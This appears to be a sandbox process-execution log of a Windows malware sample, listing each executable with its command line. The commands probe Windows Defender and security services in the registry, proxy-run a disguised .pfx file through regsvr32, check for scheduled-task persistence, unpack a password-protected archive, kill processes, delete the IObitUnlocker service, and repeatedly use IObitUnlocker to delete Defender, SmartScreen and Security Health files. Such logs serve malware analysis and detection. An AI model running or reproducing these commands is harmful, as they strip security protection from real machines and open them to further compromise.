reg query "HKLM\System\CurrentControlSet\Services\WdNisSvc"

C:\Windows\SysWOW64\reg.exe

reg query "HKLM\System\CurrentControlSet\Services\Sense"

C:\Windows\system32\regsvr32.exe

"C:\Windows\Sysnative\regsvr32.exe" /s /i:googlechromebusiness.msi "C:\Users\Admin\AppData\Local\3MediumVioletRed_4.pfx"

C:\Windows\SysWOW64\reg.exe

reg query "HKLM\System\CurrentControlSet\Services\wscsvc"

C:\Windows\SysWOW64\reg.exe

reg query "HKLM\System\CurrentControlSet\Services\SgrmBroker"

C:\Windows\SysWOW64\reg.exe

reg query "HKLM\System\CurrentControlSet\Services\SecurityHealthService"

C:\Windows\SysWOW64\reg.exe

reg query "HKLM\System\CurrentControlSet\Services\webthreatdefsvc"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:googlechromebusiness.msi \"\\?\C:\Users\Admin\AppData\Local\3MediumVioletRed_4.pfx\"' }) { exit 0 } else { exit 1 }"

C:\Windows\SysWOW64\reg.exe

reg query "HKLM\System\CurrentControlSet\Services\webthreatdefusersvc"

C:\Windows\SysWOW64\reg.exe

reg query "HKLM\System\CurrentControlSet\Services\WdNisDrv"

C:\Windows\SysWOW64\reg.exe

reg query "HKLM\System\CurrentControlSet\Services\WdBoot"

C:\Windows\SysWOW64\reg.exe

reg query "HKLM\System\CurrentControlSet\Services\WdFilter"

C:\Windows\SysWOW64\reg.exe

reg query "HKLM\System\CurrentControlSet\Services\SgrmAgent"

C:\Windows\SysWOW64\reg.exe

reg query "HKLM\System\CurrentControlSet\Services\MsSecWfp"

C:\Windows\SysWOW64\reg.exe

reg query "HKLM\System\CurrentControlSet\Services\MsSecFlt"

C:\Windows\SysWOW64\reg.exe

reg query "HKLM\System\CurrentControlSet\Services\MsSecCore"

C:\Windows\SysWOW64\reg.exe

reg query HKLM\System\CurrentControlset\Services\WdFilter

C:\Windows\SysWOW64\reg.exe

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion" /v "ProductName"

C:\Windows\SysWOW64\find.exe

find /i "Windows 7"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" ver "

C:\Windows\SysWOW64\findstr.exe

findstr /c:"6.1.7601"

C:\Users\Admin\AppData\Local\Temp\Work\7z.exe

7z x -aoa -bso0 -bsp1 "DKT.zip" -p"DDK" "Unlocker.exe"

C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe

Unlocker /CurrentDiskSize

C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe

"PowerShell.exe" -NoProfile -NonInteractive -Command -

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c sc query IObitUnlocker

C:\Windows\system32\sc.exe

sc query IObitUnlocker

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /f /pid "5256"

C:\Windows\system32\taskkill.exe

taskkill /f /pid "5256"

C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe

Unlocker /dеlwd

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c sc query IObitUnlocker

C:\Windows\system32\sc.exe

sc query IObitUnlocker

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c sc stop IObitUnlocker & sc delete IObitUnlocker

C:\Windows\system32\sc.exe

sc stop IObitUnlocker

C:\Windows\system32\sc.exe

sc delete IObitUnlocker

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /f /pid "4916"

C:\Windows\system32\taskkill.exe

taskkill /f /pid "4916"

C:\Windows\SysWOW64\timeout.exe

timeout /t 2 /nobreak

C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe

Unlocker /DеlWD

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c sc query IObitUnlocker

C:\Windows\system32\sc.exe

sc query IObitUnlocker

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\10524990101\tktVLbc.exe

"C:\Users\Admin\AppData\Local\Temp\10524990101\tktVLbc.exe"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\is-32CF7.tmp\tktVLbc.tmp

"C:\Users\Admin\AppData\Local\Temp\is-32CF7.tmp\tktVLbc.tmp" /SL5="$A01FC,10331686,867840,C:\Users\Admin\AppData\Local\Temp\10524990101\tktVLbc.exe"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

